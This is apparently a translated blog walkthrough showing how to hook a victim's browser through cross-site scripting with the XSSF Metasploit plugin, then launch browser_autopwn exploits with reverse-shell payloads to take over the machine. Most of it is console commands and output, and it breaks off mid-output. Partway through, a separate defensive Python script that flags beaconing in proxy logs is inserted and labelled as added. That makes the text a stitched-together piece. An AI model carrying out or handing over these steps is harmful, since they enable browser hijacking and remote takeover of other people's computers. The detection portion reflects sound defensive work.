TEST: How XSS obtains SYSTEM privileges on the target machine

Source: Internet
Author: User

Author: RootkitHat.Org
Suspected of installing B, but how do you know what system and browser your target uses?
A similar tool is available here: http://xss-proxy.sourceforge.net
Attachment: Parh, sploits, 2011/06, and XSSF.zip
After decompressing, copy all the extracted files to /msf3/.
Start Metasploit, create a database, and load the plug-in:

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 335 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11089 updated 239 days ago (2010.11.22)

Warning: This copy of the Metasploit Framework was last updated 239 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_disconnect
msf > db_driver mysql
msf > db_connect root:toor@127.0.0.1/xssftest
msf > load xssf

Cross-Site Scripting Framework
Ludovic Courgnaud - CONIX Security

[+] Server started: http://192.168.56.101:8888/

[*] Please, inject http://192.168.56.101:8888/loop resource in an XSS
[*] Successfully loaded plugin: XSSF

If the IP address shown is not your Internet IP address, edit /opt/metasploit3/msf3/plugins/xssf.rb and change it to your Internet IP address.
Then have the target machine load "http://192.168.56.101:8888/loop" through the XSS.

 

View XSS sessions

msf > xssf_victims

Victims
========

id  xssf_server_id  active  ip            interval  browser_name       browser_version  cookie
--  --------------  ------  --            --------  ------------       ---------------  ------
1   1               true    192.168.56.1  2         Internet Explorer  6.0              YES

[*] Use xssf_information [VictimID] to see more information about a victim

An active value of true indicates that the session can be used.
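
A defender-side view of the session listed above, added here and not part of the original post or of XSSF: a hooked browser appears in web-proxy logs as one client requesting the same resource (here /loop on port 8888) at a fixed short period. The log format, thresholds and the function name find_beacons are assumptions, and the interval column is assumed to be a polling period in seconds.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log (timestamp, client, method, URL); addresses reuse the lab values above.
SAMPLE_LOG = """\
2011-07-19T23:30:20 192.168.56.7 GET http://intranet.example/index.html
2011-07-19T23:30:21 192.168.56.7 GET http://intranet.example/index.html
2011-07-19T23:30:25 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:27 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:29 192.168.56.1 GET http://192.168.56.101:8888/loop
garbled entry
2011-07-19T23:30:31 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:33 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:35 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:31:40 192.168.56.7 GET http://intranet.example/index.html
2011-07-19T23:35:02 192.168.56.7 GET http://intranet.example/index.html
2011-07-19T23:35:03 192.168.56.7 GET http://intranet.example/index.html
"""


def find_beacons(log_text, min_hits=5, max_period=10.0, max_jitter=0.5):
    """Return (client, destination, hits, mean_period_s) for metronomic request series."""
    series = defaultdict(list)
    for line in log_text.splitlines():
        try:
            ts, client, _method, url = line.split()
            when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")
        except ValueError:  # malformed or truncated line: skip it
            continue
        u = urlsplit(url)
        # Group by client and host:port/path; the query string is ignored.
        series[(client, f"{u.netloc}{u.path}")].append(when)

    findings = []
    for (client, dest), times in sorted(series.items()):
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Human browsing is bursty; a hooked page polls at a near-constant short period.
        if mean(gaps) <= max_period and pstdev(gaps) <= max_jitter:
            findings.append((client, dest, len(times), round(mean(gaps), 2)))
    return findings


if __name__ == "__main__":
    for client, dest, hits, period in find_beacons(SAMPLE_LOG):
        print(f"{client} polls {dest} every ~{period}s ({hits} requests)")
```

The second client in the sample has as many requests as the first but irregular gaps, so only the fixed-period series is reported.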

Link an XSS session

msf > xssf_information 1

Information about victim 1
======================================
Ip address: 192.168.56.1
ACTIVE: TRUE
First request: Tue Jul 19 23:30:25 UTC 2011
Last request: Tue Jul 19 23:31:17 UTC 2011
Connection time: 52.0 seconds
Browser name: Internet Explorer
Browsers VERSION: 6.0
OS NAME: Windows
OS VERSION: XP
ARCHITECTURE: ARCH_X86
LOCATION: file://C:/Documents and Settings/dis9team/Documents/xss.htm
COOKIES? : YES
RUNNING ATTACK: NONE

How to obtain system permissions:

Use a Metasploit module to automatically start a set of browser exploit modules. Note that its port must not be the same as the XSSF plug-in's port.

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.56.101...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_cale
